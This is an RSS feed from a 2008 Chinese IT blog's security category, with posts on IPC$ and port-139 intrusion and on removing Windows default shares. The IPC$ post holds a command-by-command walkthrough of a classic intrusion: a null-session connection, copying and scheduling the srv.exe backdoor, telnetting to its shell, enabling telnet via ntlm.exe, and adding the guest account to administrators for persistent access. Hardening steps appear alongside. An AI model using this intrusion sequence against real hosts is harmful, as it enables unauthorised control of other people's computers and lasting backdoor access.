﻿<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>IT博客-红叶的技术日志-随笔分类-安全</title><link>http://www.cnitblog.com/applezk/category/6752.html</link><description>希望每天能努力多一点</description><language>zh-cn</language><lastBuildDate>Sat, 01 Oct 2011 14:57:58 GMT</lastBuildDate><pubDate>Sat, 01 Oct 2011 14:57:58 GMT</pubDate><ttl>60</ttl><item><title>用McAfee8.5屏蔽迅雷自动上传</title><link>http://www.cnitblog.com/applezk/archive/2008/03/04/40439.html</link><dc:creator>applezk's IT blog</dc:creator><author>applezk's IT blog</author><pubDate>Tue, 04 Mar 2008 02:30:00 GMT</pubDate><guid>http://www.cnitblog.com/applezk/archive/2008/03/04/40439.html</guid><wfw:comment>http://www.cnitblog.com/applezk/comments/40439.html</wfw:comment><comments>http://www.cnitblog.com/applezk/archive/2008/03/04/40439.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/applezk/comments/commentRss/40439.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/applezk/services/trackbacks/40439.html</trackback:ping><description><![CDATA[<h2>用McAfee8.5屏蔽迅雷自动上传</h2>
<div class=t_msgfont id=postmessage_11289366>本帖不讨论共享，只是探讨McAfee的妙用。<br>迅雷会偷偷的上传文件，所以开着迅雷你会发现网速减慢。即使在迅雷设置中将上传设为0，它也会上传占用带宽。<br>迅雷把你所有的下载文件的记录都存储到了系统盘下的Windows\system32\cid_store.dat里面，这样你每一次启动迅雷之后，立刻它就会从这个数据库里面读取内容，然后扫描上传.<br>关于迅雷上传的机制和一些分析，可以看看下面这个文章链接：<a href="http://www.cnbeta.com/articles/49275.htm" target=_blank><u><font color=#0000ff>http://www.cnbeta.com/articles/49275.htm</font></u></a>。<br>网上流传一个屏蔽迅雷自动上传的小工具，其实咖啡也可以做到。<br>设置如图，并不影响迅雷的正常下载。<br><br><br><br><img height=499 alt="" src="http://www.cnitblog.com/images/cnitblog_com/applezk/000.GIF" width=504 border=0><br></div>
<img src ="http://www.cnitblog.com/applezk/aggbug/40439.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/applezk/" target="_blank">applezk's IT blog</a> 2008-03-04 10:30 <a href="http://www.cnitblog.com/applezk/archive/2008/03/04/40439.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>一份详尽的IPC$入侵资料</title><link>http://www.cnitblog.com/applezk/archive/2008/01/09/38637.html</link><dc:creator>applezk's IT blog</dc:creator><author>applezk's IT blog</author><pubDate>Wed, 09 Jan 2008 03:36:00 GMT</pubDate><guid>http://www.cnitblog.com/applezk/archive/2008/01/09/38637.html</guid><wfw:comment>http://www.cnitblog.com/applezk/comments/38637.html</wfw:comment><comments>http://www.cnitblog.com/applezk/archive/2008/01/09/38637.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/applezk/comments/commentRss/38637.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/applezk/services/trackbacks/38637.html</trackback:ping><description><![CDATA[一 唠叨一下：<br>网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.<br>不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).<br>因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复!<br><br><br>二 什么是ipc$<br>IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的)，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。<br>利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)，而利用这个空的连接，连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。<br>我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$&#8230;&#8230;)和系统目录winnt或windows(admin$)。<br>所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$，访问共享资源,导出用户列表,并使用一些字典工具，进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.<br><br>解惑:<br>1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能，其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数，所以不能在Windows 9.x中运行。<br>也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)<br>2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接<br>3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表<br><br><br>三 建立ipc$连接在hack攻击中的作用<br>就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!!<br>(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server，还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)<br>不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:( <br>因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.<br>所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.<br><br><br>四 ipc$与空连接,139,445端口,默认共享的关系<br>以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)<br><br>1)ipc$与空连接:<br>不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.<br>许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).<br>2)ipc$与139,445端口:<br>ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.<br>3)ipc$与默认共享<br>默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$&#8230;&#8230;)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)<br>&nbsp;&nbsp;<br><br>五 ipc$连接失败的原因<br>以下5个原因是比较常见的:<br>1)你的系统不是NT或以上操作系统;<br>2)对方没有打开ipc$默认共享<br>3)对方未开启139或445端口(惑被防火墙屏蔽)<br>4)你的命令输入有误(比如缺少了空格等)<br>5)用户名或密码错误(空连接当然无所谓了)<br>另外,你也可以根据返回的错误号分析原因： <br>错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限； <br>错误号51，Windows 无法找到网络路径 : 网络有问题； <br>错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）； <br>错误号67，找不到网络名 ： 你的lanmanworkstation服务未启动；目标删除了ipc$； <br>错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。 <br>错误号1326，未知的用户名或错误密码 ： 原因很明显了； <br>错误号1792，试图登录，但是网络登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况） <br>错误号2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。 <br>关于ipc$连不上的问题比较复杂，除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.<br><br><br>六&nbsp;&nbsp;如何打开目标的IPC$(此段引自相关文章) <br>首先你需要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马,当然，这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道，ipc$能否使用还有很多条件。请确认相关服务都已运行，没有就启动它（不知道怎么做的请看net命令的用法）,还是不行的话（比如有防火墙，杀不了）建议放弃。 <br><br><br>七&nbsp;&nbsp;如何防范ipc$入侵<br>1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)<br>首先运行regedit，找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为：00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)<br><br>2禁止默认共享<br>1）察看本地共享资源<br>运行-cmd-输入net share<br>2）删除共享(每次输入一个）<br>net share ipc$ /delete<br>net share admin$ /delete<br>net share c$ /delete<br>net share d$ /delete（如果有e,f,&#8230;&#8230;可以继续删除）<br>3）停止server服务<br>net stop server /y （重新启动后server服务会重新开启）<br>4）修改注册表<br>运行-regedit<br>server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。 <br>pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。 <br>如果上面所说的主键不存在，就新建(右击-新建-双字节值）一个主健再改键值。 <br><br>3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务<br>控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-已禁用<br><br>4安装防火墙(选中相关设置)，或者端口过滤(滤掉139,445等),或者用新版本的优化大师<br><br>5设置复杂密码，防止通过ipc$穷举密码<br><br><br>（本教程不定期更新，欲获得最新版本，请登陆官方网站：菜菜鸟社区原创<a href="http://ccbirds.yeah.net/" target=_blank><u><font color=#0000ff>http://ccbirds.yeah.net</font></u></a>）<br><br><br>八 相关命令<br>1)建立空连接:<br>net use \\IP\ipc$ "" /user:""&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(一定要注意:这一行命令中包含了3个空格) <br><br>2)建立非空连接:<br>net use \\IP\ipc$ "用户名" /user:"密码"&nbsp;&nbsp;&nbsp;&nbsp; (同样有3个空格)<br><br>3)映射默认共享:<br>net use z: \\IP\c$ "密码" /user:"用户名"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (即可将对方的c盘映射为自己的z盘，其他盘类推)<br>如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$<br><br>4)删除一个ipc$连接<br>net use \\IP\ipc$ /del <br><br>5)删除共享映射<br>net use c: /del 删除映射的c盘，其他盘类推 <br>net use * /del 删除全部,会有提示要求按y确认<br><br><br>九 经典入侵模式<br>这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈) <br><br>1. C:\&gt;net use \\127.0.0.1\IPC$ "" /user:"admintitrators" <br>这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。<br>　　<br>2. C:\&gt;copy srv.exe \\127.0.0.1\admin$ <br>先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。<br>　　<br>3. C:\&gt;net time \\127.0.0.1 <br>查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。<br>　　<br>4. C:\&gt;at \\127.0.0.1 11:05 srv.exe <br>用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！） <br>　　<br>5. C:\&gt;net time \\127.0.0.1<br>再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。<br>　　<br>6. C:\&gt;telnet 127.0.0.1 99 <br>这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。<br>虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了<br>　　<br>7.C:\&gt;copy ntlm.exe \\127.0.0.1\admin$<br>用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。<br>　　<br>8. C:\WINNT\system32&gt;ntlm <br>输入ntlm启动（这里的C:\WINNT\system32&gt;指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！ <br><br>9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)<br><br>为了以防万一,我们再把guest激活加到管理组&nbsp;&nbsp;&nbsp;&nbsp;<br>10. C:\&gt;net user guest /active:yes <br>将对方的Guest用户激活<br><br>11. C:\&gt;net user guest 1234 <br>将Guest的密码改为1234,或者你要设定的密码<br><br>12. C:\&gt;net localgroup administrators guest /add <br>将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机)<br>
<img src ="http://www.cnitblog.com/applezk/aggbug/38637.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/applezk/" target="_blank">applezk's IT blog</a> 2008-01-09 11:36 <a href="http://www.cnitblog.com/applezk/archive/2008/01/09/38637.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>139端口入侵</title><link>http://www.cnitblog.com/applezk/archive/2008/01/09/38634.html</link><dc:creator>applezk's IT blog</dc:creator><author>applezk's IT blog</author><pubDate>Wed, 09 Jan 2008 03:28:00 GMT</pubDate><guid>http://www.cnitblog.com/applezk/archive/2008/01/09/38634.html</guid><wfw:comment>http://www.cnitblog.com/applezk/comments/38634.html</wfw:comment><comments>http://www.cnitblog.com/applezk/archive/2008/01/09/38634.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.cnitblog.com/applezk/comments/commentRss/38634.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/applezk/services/trackbacks/38634.html</trackback:ping><description><![CDATA[<span>&lt;第一部份：知识介绍&gt;<br>(1)什么是端口　　<br>　　　端口是各种程序为了接收和发送数据而开的&#8220;窗户&#8221;，程序需要它来与外界进行通讯，你可以把它想象成一个邮箱，我要传递消息给你，我就会把消息放到你的邮箱里。你要得到消息，你只需要打开邮箱把消息拿出来。同样，别的计算机为了和你的机器通讯，会把数据发到你的机器的端口上，计算机读取端口就可以得到数据。<br>　　(2)端口是唯一的吗？　　<br>　　　端口不是唯一的。端口分两种：TCP端口和UDP端口，每种端口最多有65535个，分别用自然数1～65535编号。这里我不解释TCP端口和UDP端口有什么不同，你只须要知道不同的端口对应不同的程序，每个程序只能只能读取发送到属于自己端口上的数据。举个例子，hi.exe打开TCP6500端口，如果我把数据发送到TCP6501端口或是UDP6500端口，hi.exe都接收不到，只有发送到TCP6500端口的数据hi.exe才能接收。<br>　　(3)TCP<strong style="COLOR: black; BACKGROUND-COLOR: #ffff66">139端口</strong>的作用<br>　　　TCP139是用于网络共享的端口，只有当一台计算机开放了TCP<strong style="COLOR: black; BACKGROUND-COLOR: #ffff66">139端口</strong>时别的计算机才能访问其上的共享文件。但是在Windows 2000/ NT/ XP中，TCP<strong style="COLOR: black; BACKGROUND-COLOR: #ffff66">139端口</strong>还有一个重要的作用：远程管理连接(IPC$,Admin$),这是微软为了方便管理员对远程计算机的管理而特意设置的。为了能够成功地建立IPC$(远程管理)连接，你需要管理员的用户名和密码，这也是基于<strong style="COLOR: black; BACKGROUND-COLOR: #ffff66">139端口</strong>入侵的重点，只要我们得到了远程计算机的密码，再通过<strong style="COLOR: black; BACKGROUND-COLOR: #ffff66">139端口</strong>进行IPC$连接，我们就完全控制了远程的计算机。<br></span>
<img src ="http://www.cnitblog.com/applezk/aggbug/38634.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/applezk/" target="_blank">applezk's IT blog</a> 2008-01-09 11:28 <a href="http://www.cnitblog.com/applezk/archive/2008/01/09/38634.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>如何删除c:$,admin$,ipc$共享</title><link>http://www.cnitblog.com/applezk/archive/2008/01/09/38633.html</link><dc:creator>applezk's IT blog</dc:creator><author>applezk's IT blog</author><pubDate>Wed, 09 Jan 2008 03:23:00 GMT</pubDate><guid>http://www.cnitblog.com/applezk/archive/2008/01/09/38633.html</guid><wfw:comment>http://www.cnitblog.com/applezk/comments/38633.html</wfw:comment><comments>http://www.cnitblog.com/applezk/archive/2008/01/09/38633.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/applezk/comments/commentRss/38633.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/applezk/services/trackbacks/38633.html</trackback:ping><description><![CDATA[IPC＄漏洞描述
<p>&nbsp;</p>
<p>　　用过Windows&nbsp;2000的人都知道，Windows&nbsp;2000的默认安装允许任何用户通过空用户连接（IPC＄）得到系统所有账号和共享列表，这本来是为了方便局域网用户共享资源和文件的，但是任何一个远程用户都可以利用这个空的连接得到你的用户列表。一些别有用心者会利用这项功能，查找我们的用户列表，并使用一些字典工具，对我们的主机进行攻击。另外，在安装系统时创建一些隐藏的共享，通过&#8220;计算机名或IP地址\盘符＄&#8221;就可以访问。作为系统管理员的我，平时也喜欢利用这些共享来进行远程管理计算机和查看计算机的共享资源时，没想到却给黑客留了通道。&nbsp;</p>
<p>　　黑客攻击</p>
<p>&#8220;流光&#8221;主界面&nbsp;</p>
<p>　　一些别有用心者曾经利用黑客工具软件对我所管理的服务器进行IPC＄漏洞探测，其中以&#8220;流光&#8221;软件最为出名，其运行主界面如图1所示，按[Ctrl+R]键弹出扫描框。在扫描范围栏里输入你要扫描的IP地址范围，在扫描主机类型里选择Windows&nbsp;NT/98，确定后进行扫描，这样，一些在线的Windows&nbsp;NT/98机器就会被扫描出来。&nbsp;</p>
<p>扫描对话框&nbsp;</p>
<p>　　鼠标右击界面上&#8220;IPC＄主机&#8221;，选择&#8220;探测&#8221;下面的&#8220;探测所有IPC＄用户列表&#8221;命令，就会探测出给出IP地址范围的机器里的IPC＄用户列表，关键是这里也可以扫描出这些用户列表中没有密码或是简单密码的用户。当然，得到用户列表后也可以选用专门的黑客字典试探出密码来，谁能保证，服务器里每个用户的密码都很强壮呢？所以这些人总有得逞的时候。&nbsp;　&nbsp;</p>
<p>　　&nbsp;<br>　　有了用户名和密码，在IE浏览器的地址栏输入&#8220;\\IP地址&#8221;，就会弹出一个对话框要求输入用户名和密码，将得到的用户名和密码输入之后就可轻松进入目标机器，不过这里看到的仅是目标机器主动共享出来的文件夹。如果在地址栏输入&#8220;\\IP地址\C＄（或是D＄，E＄等）&#8221;，则可以看到目标机器C盘（或是D＄，E＄等）的全部内容。&nbsp;</p>
<p>　　防范IPC＄漏洞攻击</p>
<p>　　知道黑客利用此漏洞入侵后，我惊出了一身冷汗，赶紧把密码设置得复杂一些，但是无论我采用多复杂的密码，过一段时间还是发现有被入侵的迹象。看来万事都不能两全，计算机管理也一样，要方便就不安全，要安全就不方便，所以我只好采用下面的方法把IPC$漏洞堵住，这样自己也就没办法享受默认共享带来的方便了。&nbsp;</p>
<p>　　1.&nbsp;通过修改注册表来禁止建立空连接（IPC＄）&nbsp;</p>
<p>　　点击［开始］&#8594;［运行］，在运行框里输入&#8220;Regedit&#8221;回车后打开注册表，将HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA的RestrictAnonymous&nbsp;项设置为&#8220;1&#8221;，就可以禁止空用户连接。&nbsp;</p>
<p>　　2.&nbsp;通过修改注册表来禁止管理共享&nbsp;C＄D＄等　&nbsp;</p>
<p>　　打开注册表的HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet&nbsp;\Services\LanmanServer\Parameters项&nbsp;</p>
<p>　　对于服务器，添加键值&#8220;AutoShareServer&#8221;，类型为&#8220;REG_DWORD&#8221;，值为&#8220;0&#8221;。&nbsp;</p>
<p>　　对于客户机，添加键值&#8220;AutoShareWks&#8221;，类型为&#8220;REG_DWORD&#8221;，值为&#8220;0&#8221;。&nbsp;</p>
<p>UpReg.reg</p>
<p>Windows Registry Editor Version 5.00<br>[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]<br>AutoShareServer=dword:00000000<br>AutoSharewks=dword:00000000</p>
<p>&nbsp;</p>
<p>　　3.&nbsp;批处理删除共享&nbsp;</p>
<p>net share d$&nbsp; delete</p>
<p>net share ipc$ /delete</p>
<p>net share admin$ /delete</p>
<p>net share查看</p>
<p>要全部停止,控制面板-&gt;服务-server即可</p>
<p>&nbsp;</p>
<p>IPC$共享是为管理系统而设置的，关闭之后，当机器下次重新启动的时候，会自动重建。也就是说，IPC$共享无法彻底关闭，这是系统的需要。如果一定要完全关闭IPC$共享，可以在&#8220;管理工具&#8594;服务&#8221;中，停止Server服务，但这样的话，系统中的所有共享也将不复存在。</p>
<img src ="http://www.cnitblog.com/applezk/aggbug/38633.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/applezk/" target="_blank">applezk's IT blog</a> 2008-01-09 11:23 <a href="http://www.cnitblog.com/applezk/archive/2008/01/09/38633.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item></channel></rss>